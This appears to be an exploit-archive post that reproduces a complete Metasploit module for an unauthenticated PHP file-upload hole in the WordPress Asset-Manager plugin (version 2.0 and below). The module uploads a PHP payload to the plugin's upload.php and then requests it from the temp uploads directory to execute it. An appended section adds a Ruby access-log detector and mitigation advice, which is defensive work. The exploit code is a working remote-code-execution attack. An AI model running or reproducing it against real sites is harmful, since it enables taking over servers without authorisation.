WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager plugin for WordPress, version 2.0 and below. The plugin allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The module expects the response body to contain the stored file name
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
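
As an added example (not part of the original post or of the Metasploit module), a small Ruby detector for the two-step pattern the module's exploit method performs against a site: an unauthenticated POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The access log lines, IPs and file names below are constructed samples, and the 300-second correlation window is an assumption.

```ruby
# Added example, not part of the original post or of the Metasploit module:
# flags the upload-then-execute pattern in combined-format access logs.
require 'time'

# Constructed sample log lines (not real traffic); documentation IPs.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzdm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:25:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:26:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG

LOG_RE      = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# A POST to the plugin's upload.php is worth a medium alert on its own (the
# endpoint needs no authentication); a successful GET of a .php file under the
# temp directory from the same client within `window` seconds (assumed 300)
# is the execution step and is raised to high.
def detect(log_text, window: 300)
  events = log_text.each_line.map { |l| parse_line(l.strip) }.compact
  alerts = []
  events.select { |e| e[:method] == 'POST' && e[:path] =~ UPLOAD_RE }.each do |up|
    alerts << { severity: :medium, ip: up[:ip], reason: 'POST to asset-manager upload.php' }
    events.each do |e|
      next unless e[:ip] == up[:ip] && e[:method] == 'GET' && e[:status] == 200
      next unless e[:path] =~ TEMP_PHP_RE && e[:ts] >= up[:ts] && e[:ts] - up[:ts] <= window
      alerts << { severity: :high, ip: up[:ip], reason: "PHP served from temp dir: #{e[:path]}" }
    end
  end
  alerts
end

if __FILE__ == $0
  detect(SAMPLE_LOG).each { |a| puts "#{a[:severity].to_s.upcase} #{a[:ip]} #{a[:reason]}" }
end
```

Beyond detection, the durable mitigation is to deny PHP execution under wp-content/uploads at the web server and to require authentication on the upload endpoint.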